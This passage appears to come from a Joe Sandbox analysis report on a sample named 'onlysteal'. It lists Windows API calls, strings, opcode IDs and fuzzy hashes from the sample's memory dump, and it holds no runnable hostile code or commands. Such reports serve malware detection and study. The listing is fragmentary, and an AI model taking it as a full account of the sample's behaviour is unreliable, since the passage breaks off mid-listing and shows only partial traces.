                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 616cbce7f8b1a93ce2b97511779f4d743dce6e8b0c0420210d55aa7c63625a39
                                      • Instruction ID: 653e8a77354c10f8cf140d45be82d162ead9a1ae6475ca9d2c04e7d33dee5713
                                      • Opcode Fuzzy Hash: 616cbce7f8b1a93ce2b97511779f4d743dce6e8b0c0420210d55aa7c63625a39
                                      • Instruction Fuzzy Hash: F9A011C22BE002BC3A0C33A0AC03C3B020EE0C2B203328A2EF80280080A88008B00C30
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E580
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 95651d3367890245b79c9bae9c2e783175a6005238ae823d53e5f8411f2e306a
                                      • Instruction ID: 653e8a77354c10f8cf140d45be82d162ead9a1ae6475ca9d2c04e7d33dee5713
                                      • Opcode Fuzzy Hash: 95651d3367890245b79c9bae9c2e783175a6005238ae823d53e5f8411f2e306a
                                      • Instruction Fuzzy Hash: F9A011C22BE002BC3A0C33A0AC03C3B020EE0C2B203328A2EF80280080A88008B00C30
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,0024AE72,C:\Users\user\Desktop,00000000,0027946A,00000006), ref: 0024AC08
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: 0792a87bd794366217ebe45f1f62fd2ecdc790f0a9b504abaa3862f2cf634720
                                      • Instruction ID: 92ba33814cb184874632f3c2f2c6b7806e714a24df9120adeea117e99857c56d
                                      • Opcode Fuzzy Hash: 0792a87bd794366217ebe45f1f62fd2ecdc790f0a9b504abaa3862f2cf634720
                                      • Instruction Fuzzy Hash: 08A011302002008BAA008B32AF0AA0EBAAAAFA2B00F00C028A00880030CB30C820AA00
                                      APIs
                                      • CloseHandle.KERNELBASE(000000FF,?,?,002395D6,?,?,?,?,?,00262641,000000FF), ref: 0023963B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 0bb71cb4bdbdc769b4e3eff62b8384383ff7eb5e668670dbec05960d115c79ea
                                      • Instruction ID: 6580028ee19354f6757bba35015487cd60cc84b40a3d64d91d6454a4452cda18
                                      • Opcode Fuzzy Hash: 0bb71cb4bdbdc769b4e3eff62b8384383ff7eb5e668670dbec05960d115c79ea
                                      • Instruction Fuzzy Hash: F1F0E9B01A2B069FDB308E24C84A792B7EC6B13321F044B1ED0E6429E0D3B069ED8E40
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0024C2B1
                                      • EndDialog.USER32(?,00000006), ref: 0024C2C4
                                      • GetDlgItem.USER32(?,0000006C), ref: 0024C2E0
                                      • SetFocus.USER32(00000000), ref: 0024C2E7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 0024C321
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0024C358
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0024C36E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0024C38C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0024C39C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0024C3B8
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0024C3D4
                                      • _swprintf.LIBCMT ref: 0024C404
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0024C417
                                      • FindClose.KERNEL32(00000000), ref: 0024C41E
                                      • _swprintf.LIBCMT ref: 0024C477
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 0024C48A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0024C4A7
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0024C4C7
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0024C4D7
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0024C4F1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0024C509
                                      • _swprintf.LIBCMT ref: 0024C535
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0024C548
                                      • _swprintf.LIBCMT ref: 0024C59C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 0024C5AF
                                        • Part of subcall function 0024AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0024AF35
                                        • Part of subcall function 0024AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0026E72C,?,?), ref: 0024AF84
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$P$$REPLACEFILEDLG
                                      • API String ID: 797121971-3943368862
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00236FAA
                                      • _wcslen.LIBCMT ref: 00237013
                                      • _wcslen.LIBCMT ref: 00237084
                                        • Part of subcall function 00237A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00237AAB
                                        • Part of subcall function 00237A9C: GetLastError.KERNEL32 ref: 00237AF1
                                        • Part of subcall function 00237A9C: CloseHandle.KERNEL32(?), ref: 00237B00
                                        • Part of subcall function 0023A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641,000000FF), ref: 0023A1F1
                                        • Part of subcall function 0023A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641), ref: 0023A21F
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00237139
                                      • CloseHandle.KERNEL32(00000000), ref: 00237155
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00237298
                                        • Part of subcall function 00239DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002373BC,?,?,?,00000000), ref: 00239DBC
                                        • Part of subcall function 00239DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00239E70
                                        • Part of subcall function 00239620: CloseHandle.KERNELBASE(000000FF,?,?,002395D6,?,?,?,?,?,00262641,000000FF), ref: 0023963B
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A501
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A532
                                      Similarity
                                      • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3983180755-3508440684
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      Similarity
                                      • API ID: H_prolog_swprintf
                                      • String ID: CMT$h%u$hc%u
                                      • API String ID: 146138363-3282847064
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00232874
                                      • _strlen.LIBCMT ref: 00232E3F
                                        • Part of subcall function 002402BA: __EH_prolog.LIBCMT ref: 002402BF
                                        • Part of subcall function 00241B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0023BAE9,00000000,?,?,?,00010438), ref: 00241BA0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00232F91
                                      Similarity
                                      • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                      • String ID: CMT
                                      • API String ID: 1206968400-2756464174
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024F844
                                      • IsDebuggerPresent.KERNEL32 ref: 0024F910
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0024F930
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0024F93A
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                      • String ID:
                                      • API String ID: 254469556-0
                                      APIs
                                      • VirtualQuery.KERNEL32(80000000,0024E5E8,0000001C,0024E7DD,00000000,?,?,?,?,?,?,?,0024E5E8,00000004,00291CEC,0024E86D), ref: 0024E6B4
                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0024E5E8,00000004,00291CEC,0024E86D), ref: 0024E6CF
                                      Similarity
                                      • API ID: InfoQuerySystemVirtual
                                      • String ID: D
                                      • API String ID: 401686933-2746444292
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00258FB5
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00258FBF
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00258FCC
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0024AF35
                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,0026E72C,?,?), ref: 0024AF84
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      APIs
                                      • GetLastError.KERNEL32(00236DDF,00000000,00000400), ref: 00236C74
                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00236C95
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002619EF,?,?,00000008,?,?,0026168F,00000000), ref: 00261C21
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0024F66A
                                      Similarity
                                      • API ID: FeaturePresentProcessor
                                      • String ID:
                                      • API String ID: 2325560087-0
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0023B16B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 0f713c2bc1462738284a770b4e1c4b387605fddcd610aee72c41ca53b063421a
                                      • Instruction ID: 61a5686768f2e1be5fd88d5878d91f936cf7effd77b8dc272deea4c666ad16b6
                                      • Opcode Fuzzy Hash: 0f713c2bc1462738284a770b4e1c4b387605fddcd610aee72c41ca53b063421a
                                      • Instruction Fuzzy Hash: 19F03AB8E102088FDB18CF18FCAA6E973F1FB88315F104295DA1993390D3B0A9D48E64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: 5ac20afc28240edb85ba37dda14c8a8aba71fe19086bbaca7a8feacf1cc8bebd
                                      • Instruction ID: af77c6bbdd2d020c0fdb9e5c6f82179ade9b23f60021081fa3bf982afae31085
                                      • Opcode Fuzzy Hash: 5ac20afc28240edb85ba37dda14c8a8aba71fe19086bbaca7a8feacf1cc8bebd
                                      • Instruction Fuzzy Hash: 2EC127B6A183418FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E955CB96
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0024F3A5), ref: 0024F9DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f9fff082e5621cb62b8ca4619b423f84469440cbcd206f88f68b2844091d4313
                                      • Instruction ID: d88594f71a3d22f1bce6a1b55f67bec55b695d81473332900eba8379e2a68fcd
                                      • Opcode Fuzzy Hash: f9fff082e5621cb62b8ca4619b423f84469440cbcd206f88f68b2844091d4313
                                      • Instruction Fuzzy Hash:
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 19a9e9bd63bff6d6186d168dc1daf31dc1cf9a8c04bec1ccb2b02c14caea5d1e
                                      • Instruction ID: b401809302c28779fa9055f8705700bf37faf38b839e27a653302c035da7bbf9
                                      • Opcode Fuzzy Hash: 19a9e9bd63bff6d6186d168dc1daf31dc1cf9a8c04bec1ccb2b02c14caea5d1e
                                      • Instruction Fuzzy Hash: 1BA00171602201EB9744CF35BE4D6493AA9AA5669170980AAA50DC55A0EA6485A8AA01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction ID: b6dd43435103a024d544a0fb553f08a25fcdaa80ae6fcae99ca19d2375f87001
                                      • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction Fuzzy Hash: 21620A716147859FCB29CF28C4946B9BBE1BF96304F08C96ED8DA8B342D730E955CB12
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction ID: 6caa43d6a76aa316ed296e177b04fc9b3e4f12b0b7cfe141bc29a7f65448a1eb
                                      • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction Fuzzy Hash: 7E62FB7162C3458FCB19CF28C8806B9BBE1BF95304F18896DECAA8B346D770E955CB15
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                      • Instruction ID: f6d4a4b2b858fc122e281be66293fb7883fd0872426f7dfd58857ee320dbb661
                                      • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                      • Instruction Fuzzy Hash: D1523B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE59597255D334EA19CB86
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94c86917fd8b6335d4503316febc97662c5ff378af249632e1e0ac6e6f043030
                                      • Instruction ID: 071cb96b022bd1a8a90b5941fe06e15b463e655edcadc2a68c092ab402836d14
                                      • Opcode Fuzzy Hash: 94c86917fd8b6335d4503316febc97662c5ff378af249632e1e0ac6e6f043030
                                      • Instruction Fuzzy Hash: 4E12C3B16287069FC72CCF28C490A79B7E1FF94304F50492EE9A6C7781D374A9A5CB45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 523aa7ef74bc688a96aee42a301b9e871bab7c06b688151adc7b6ea4139fb798
                                      • Instruction ID: b6380bda0c03a711a95d11f7955317bb6d6e2518de1b72c06bc37c63e179c666
                                      • Opcode Fuzzy Hash: 523aa7ef74bc688a96aee42a301b9e871bab7c06b688151adc7b6ea4139fb798
                                      • Instruction Fuzzy Hash: CDF19CB16283028FC718CF29C58862ABBE9EFC9314F254A2EF4C5A7355D630E955CF46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 0a6b5905d89823e50bab0cff1e4de5301f81a2fe6d59c77cd1ec3948b1a78fba
                                      • Instruction ID: 8cb7b003e5baa4ca22a7c18966f93ffe7f7f6a3397946f3326d96c75f924115a
                                      • Opcode Fuzzy Hash: 0a6b5905d89823e50bab0cff1e4de5301f81a2fe6d59c77cd1ec3948b1a78fba
                                      • Instruction Fuzzy Hash: 0ED1C9B1A183418FDB18CF28C88475BBBE1BF89308F04456DE8999B342D774E929CB57
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
